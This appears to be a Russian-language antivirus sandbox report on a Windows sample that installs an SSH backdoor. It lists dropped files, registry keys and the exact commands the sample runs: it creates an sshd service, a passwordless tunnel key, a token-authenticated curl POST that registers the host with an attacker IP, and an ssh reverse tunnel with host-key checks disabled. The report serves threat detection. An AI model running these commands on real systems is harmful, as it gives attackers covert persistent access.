Техническая информация
- [HKLM\SYSTEM\CurrentControlSet\Services\sshd] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\sshd] 'ImagePath' = '%ProgramFiles%\OpenSSH\sshd.exe'
- 'sshd' %ProgramFiles%\OpenSSH\sshd.exe
- %TEMP%\__psscriptpolicytest_zrm2vvas.tmw.ps1
- %TEMP%\__psscriptpolicytest_wnrqtx3v.kbr.psm1
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-07-58-598.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-07-59-143.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-07-59-197.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-07-59-358.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-07-59-400.dump
- %TEMP%\__psscriptpolicytest_4fbxbxfv.xfd.ps1
- %TEMP%\__psscriptpolicytest_4cmxzwgl.cmg.psm1
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-00-085.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-00-116.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-00-348.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-00-559.dump
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\appxprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\assocprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\cbsprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\dismcore.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\dismcoreps.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\dismhost.exe
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\dismprov.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\dmiprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\appxprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\assocprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\cbsprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\dismcore.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\dismprov.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\dmiprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\ffuprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\folderprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\genericprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\ibsprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\imagingprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\intlprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\logprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\msiprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\offlinesetupprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\osprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\provprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\setupplatformprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\smiprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\sysprepprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\transmogprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\unattendprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\vhdprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\en-us\wimprovider.dll.mui
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\ffuprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\folderprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\genericprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\ibsprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\imagingprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\intlprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\logprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\msiprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\offlinesetupprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\osprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\provprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\setupplatformprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\smiprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\sysprepprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\transmogprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\unattendprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\vhdprovider.dll
- %TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\wimprovider.dll
- %LOCALAPPDATA%\microsoft\windows\powershell\moduleanalysiscache
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\appxprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\assocprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\cbsprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\dismcore.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\dismcoreps.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\dismhost.exe
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\dismprov.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\dmiprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\appxprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\assocprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\cbsprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\dismcore.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\dismprov.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\dmiprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\ffuprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\folderprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\genericprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\ibsprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\imagingprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\intlprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\logprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\msiprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\offlinesetupprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\osprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\provprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\setupplatformprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\smiprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\sysprepprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\transmogprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\unattendprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\vhdprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\en-us\wimprovider.dll.mui
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\ffuprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\folderprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\genericprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\ibsprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\imagingprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\intlprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\logprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\msiprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\offlinesetupprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\osprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\provprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\setupplatformprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\smiprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\sysprepprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\transmogprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\unattendprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\vhdprovider.dll
- %TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\wimprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\appxprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\assocprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\cbsprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\dismcore.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\dismcoreps.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\dismhost.exe
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\dismprov.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\dmiprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\appxprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\assocprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\cbsprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\dismcore.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\dismprov.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\dmiprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\ffuprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\folderprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\genericprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\ibsprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\imagingprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\intlprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\logprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\msiprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\offlinesetupprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\osprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\provprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\setupplatformprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\smiprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\sysprepprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\transmogprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\unattendprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\vhdprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\en-us\wimprovider.dll.mui
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\ffuprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\folderprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\genericprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\ibsprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\imagingprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\intlprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\logprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\msiprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\offlinesetupprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\osprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\provprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\setupplatformprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\smiprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\sysprepprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\transmogprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\unattendprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\vhdprovider.dll
- %TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\wimprovider.dll
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-47-183.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-47-400.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-47-431.dump
- %TEMP%\__psscriptpolicytest_to0oka4z.mk3.ps1
- %TEMP%\__psscriptpolicytest_yumcjc3h.0bf.psm1
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-47-685.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-47-716.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-47-779.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-48-102.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-48-149.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-48-288.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-48-350.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-48-721.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-48-891.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-48-991.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-022.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-069.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-092.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-123.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-154.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-185.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-208.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-254.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-308.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-355.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-424.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-471.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-493.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-540.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-571.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-609.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-641.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-687.dump
- %TEMP%\content\4936-1096-<Имя файла>.exe-16-08-49-710.dump
- %ALLUSERSPROFILE%\microsoft\windows\tunnelservice\tunnel_key
- %ALLUSERSPROFILE%\microsoft\windows\tunnelservice\tunnel_key.pub
- %HOMEPATH%\.ssh\authorized_keys
- %ALLUSERSPROFILE%\ssh\administrators_authorized_keys
- %TEMP%\tmp7b27.tmp
- %ALLUSERSPROFILE%\microsoft\windows\tunnelservice\tunnel_port
- %TEMP%\__psscriptpolicytest_zrm2vvas.tmw.ps1
- %TEMP%\__psscriptpolicytest_wnrqtx3v.kbr.psm1
- %TEMP%\__psscriptpolicytest_4fbxbxfv.xfd.ps1
- %TEMP%\__psscriptpolicytest_4cmxzwgl.cmg.psm1
- %TEMP%\__psscriptpolicytest_to0oka4z.mk3.ps1
- %TEMP%\__psscriptpolicytest_yumcjc3h.0bf.psm1
- %TEMP%\tmp7b27.tmp
- '10#.#94.132.139':8443
- '10#.#94.132.139':22
- '%TEMP%\25d6315a-12ea-4e6b-babd-e5df631c4f2c\dismhost.exe' {1CDDD212-C840-48B2-86BA-C959560E1A4F}
- '%TEMP%\c00ac5e9-244c-423b-8f01-c4c9b4bf7fc2\dismhost.exe' {8E4F8BC1-A297-4D1C-8542-0403CB4CE995}
- '%TEMP%\b319fb9e-a4ad-406e-bdf9-2c690611463e\dismhost.exe' {F8218DC7-D175-420B-B600-F02BDE77A9CD}
- '<SYSTEM32>\sc.exe' stop sshd
- '<SYSTEM32>\netstat.exe' -an
- '<SYSTEM32>\sc.exe' create sshd binPath= "%ProgramFiles%\OpenSSH\sshd.exe" start= auto
- '<SYSTEM32>\sc.exe' start sshd
- '<SYSTEM32>\openssh\ssh-keygen.exe' -t ed25519 -f "%ALLUSERSPROFILE%\Microsoft\Windows\TunnelService\tunnel_key" -N ""
- '<SYSTEM32>\icacls.exe' %HOMEPATH%\.ssh\authorized_keys /inheritance:r /grant Administrator:F /grant SYSTEM:F
- '<SYSTEM32>\curl.exe' -sk -X POST -H "X-Token: 1f718bc00e23601929d496628b15731cfbd83817cb70da2652edab609e49fb59" -H "Content-Type: application/json" -d @%TEMP%\tmp7B27.tmp https://10#.#94.132.139:8443/api/register
- '<SYSTEM32>\openssh\ssh.exe' -N -i "%ALLUSERSPROFILE%\Microsoft\Windows\TunnelService\tunnel_key" -o ServerAliveInterval=60 -o ServerAliveCountMax=3 -o StrictHostKeyChecking=no -o UserKnownHostsFile=NUL -o BatchMode=yes -R...